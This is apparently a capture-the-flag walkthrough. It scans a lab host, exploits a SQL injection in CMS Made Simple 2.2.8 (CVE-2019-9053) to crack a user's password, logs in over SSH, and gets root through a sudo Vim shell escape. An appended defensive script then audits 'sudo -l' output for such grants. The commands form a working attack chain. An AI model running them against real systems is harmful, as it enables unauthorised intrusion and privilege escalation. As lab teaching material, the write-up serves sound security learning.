Beginner level CTF
We will start with an nmap scan:
nmap -A -T4 10.10.232.89
We found 2 services running below port 1000, namely FTP (21) and HTTP (80).
We can also see that SSH is running on a higher, non-standard port (2222).
I view the default web page and see nothing of interest, so let's use gobuster to enumerate directories:
gobuster dir -u http://10.10.232.89/ -w /usr/share/wordlists/dirb/common.txt -t 30
Let's look at the /robots.txt file
and the /simple page.
At the bottom of the /simple page, I see the CMS version (CMS Made Simple 2.2.8), so let's search for a known exploit:
searchsploit cms made simple 2.2.8
We can copy the exploit locally using searchsploit -m 46635.py
The CVE is CVE-2019-9053 and the vulnerability type is SQLi (SQL injection).
In the script, I see a Python library that needs to be installed with pip, and three parameters to use:
python2.7 46635.py -u http://10.10.206.254/simple --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt
Wait a while and the script will recover the password hash and crack it:
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
Now try to connect to the SSH server with the user "mitch" and the password "secret":
ssh mitch@10.10.206.254 -p 2222
and we find the user.txt flag.
Let's see what other users exist under the /home directory:
$ ls /home
mitch sunbath
sudo -l -l
shows that only Vim can be run as root.
sudo vim
In Vim, use the command :!sh
to spawn a root shell from within Vim.
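A defender-side check for the misconfiguration exploited above, added here as an example and not part of the original write-up: it parses the rule lines of `sudo -l` output and flags root grants on binaries that can drop to a shell, such as Vim. The sample output is constructed to match the shape of `sudo -l`, not captured from the box, and the binary list is an assumption, not exhaustive.

```python
"""Audit `sudo -l` output for root grants on shell-capable binaries."""
import re

# Binaries that can spawn a shell or run arbitrary commands when run with
# elevated privileges (assumed, illustrative list; extend for your estate).
SHELL_ESCAPE_BINARIES = {"vim", "vi", "nano", "less", "more", "man", "find",
                         "awk", "python", "python3", "perl", "bash", "sh"}

# Rule lines look like "    (root) NOPASSWD: /usr/bin/vim, /usr/bin/less"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str):
    """Return (runas, nopasswd, [commands]) for each rule line found."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header / Defaults lines carry no rule
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        nopasswd = "NOPASSWD" in m.group("tags")
        rules.append((m.group("runas").strip(), nopasswd, cmds))
    return rules


def risky_grants(output: str):
    """Flag commands runnable as root that can escape to a shell."""
    findings = []
    for runas, nopasswd, cmds in parse_sudo_l(output):
        if runas.split(":")[0].strip() not in ("ALL", "root"):
            continue  # only root-equivalent grants matter here
        for cmd in cmds:
            name = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or name in SHELL_ESCAPE_BINARIES:
                findings.append({"command": cmd, "nopasswd": nopasswd})
    return findings


# Constructed sample in the shape of `sudo -l` output (not from the box).
SAMPLE = """Matching Defaults entries for mitch on this host:
    env_reset, mail_badpass

User mitch may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/vim
"""

if __name__ == "__main__":
    for f in risky_grants(SAMPLE):
        flag = " (no password required)" if f["nopasswd"] else ""
        print(f"[!] shell-capable sudo grant as root: {f['command']}{flag}")
```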